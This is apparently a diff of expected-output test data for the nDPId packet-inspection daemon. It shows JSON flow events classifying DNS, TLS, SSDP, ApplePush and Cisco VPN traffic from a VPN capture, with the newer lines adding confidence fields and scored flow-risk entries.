-00655{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1569687267797,"flow_last_seen":1569687267821,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":10,"midstream":1,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"17.57.144.116","src_port":56886,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ApplePush.Apple","breed":"Safe","category":"Cloud"}}
-00811{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":57,"flow_first_seen":1569687260591,"flow_last_seen":1569687262892,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":9167,"flow_avg_l4_payload_len":160,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port","6":"Self-signed Certificate","15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing"},"proto":"TLS","breed":"Safe","category":"Web"}}
-00633{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687247596,"flow_last_seen":1569687248620,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687261485,"flow_last_seen":1569687261501,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":77,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59222,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267799,"flow_last_seen":1569687267819,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51060,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"}}
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267477,"flow_last_seen":1569687267493,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57253,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687261034,"flow_last_seen":1569687261050,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57261,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687246924,"flow_last_seen":1569687246924,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569687241422,"flow_last_seen":1569687286460,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":2200,"flow_avg_l4_payload_len":73,"midstream":1,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56320,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687245295,"flow_last_seen":1569687245320,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":80,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61387,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687269716,"flow_last_seen":1569687269716,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":49816,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1569687267797,"flow_last_seen":1569687267821,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":10,"midstream":1,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"17.57.144.116","src_port":56886,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}}
+01161{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":57,"flow_first_seen":1569687260591,"flow_last_seen":1569687262892,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":9167,"flow_avg_l4_payload_len":160,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687247596,"flow_last_seen":1569687248620,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687260751,"flow_last_seen":1569687260772,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61613,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267800,"flow_last_seen":1569687267818,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":331,"flow_avg_l4_payload_len":165,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59582,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687268747,"flow_last_seen":1569687268747,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":50081,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00597{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267841,"flow_last_seen":1569687288158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.103.196","src_port":56871,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267800,"flow_last_seen":1569687267818,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":331,"flow_avg_l4_payload_len":165,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59582,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687268747,"flow_last_seen":1569687268747,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":50081,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00633{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267841,"flow_last_seen":1569687288158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.103.196","src_port":56871,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267841,"flow_last_seen":1569687288158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.103.196","src_port":56871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687270740,"flow_last_seen":1569687270740,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":48166,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00718{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569687245379,"flow_last_seen":1569687245725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8058,"flow_avg_l4_payload_len":268,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8":"Weak TLS cipher","24":"SNI TLS extension was missing"},"proto":"TLS","breed":"Safe","category":"Web"}}
-00719{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1569687245688,"flow_last_seen":1569687268830,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":22452,"flow_avg_l4_payload_len":415,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8":"Weak TLS cipher","24":"SNI TLS extension was missing"},"proto":"TLS","breed":"Safe","category":"Web"}}
-00761{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":92,"flow_first_seen":1569687267035,"flow_last_seen":1569687288923,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21688,"flow_avg_l4_payload_len":235,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8":"Weak TLS cipher","15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing"},"proto":"TLS","breed":"Safe","category":"Web"}}
-00612{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267988,"flow_last_seen":1569687268026,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"74.125.197.188","src_port":56874,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687270740,"flow_last_seen":1569687270740,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":48166,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00905{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569687245379,"flow_last_seen":1569687245725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8058,"flow_avg_l4_payload_len":268,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00906{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1569687245688,"flow_last_seen":1569687268830,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":22452,"flow_avg_l4_payload_len":415,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
+01028{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":92,"flow_first_seen":1569687267035,"flow_last_seen":1569687288923,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21688,"flow_avg_l4_payload_len":235,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267988,"flow_last_seen":1569687268026,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"74.125.197.188","src_port":56874,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
 00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267988,"flow_last_seen":1569687268026,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"74.125.197.188","src_port":56874,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00621{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1569687245576,"flow_last_seen":1569687267323,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":33,"midstream":1,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56914,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1569687245576,"flow_last_seen":1569687267323,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":33,"midstream":1,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1569687245576,"flow_last_seen":1569687267323,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":33,"midstream":1,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00621{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1569687245576,"flow_last_seen":1569687268339,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":33,"midstream":1,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56915,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1569687245576,"flow_last_seen":1569687268339,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":33,"midstream":1,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56915,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1569687245576,"flow_last_seen":1569687268339,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":33,"midstream":1,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56915,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00607{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687267453,"flow_last_seen":1569687267455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56865,"dst_port":8008,"l4_proto":"tcp","ndpi": {"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}}
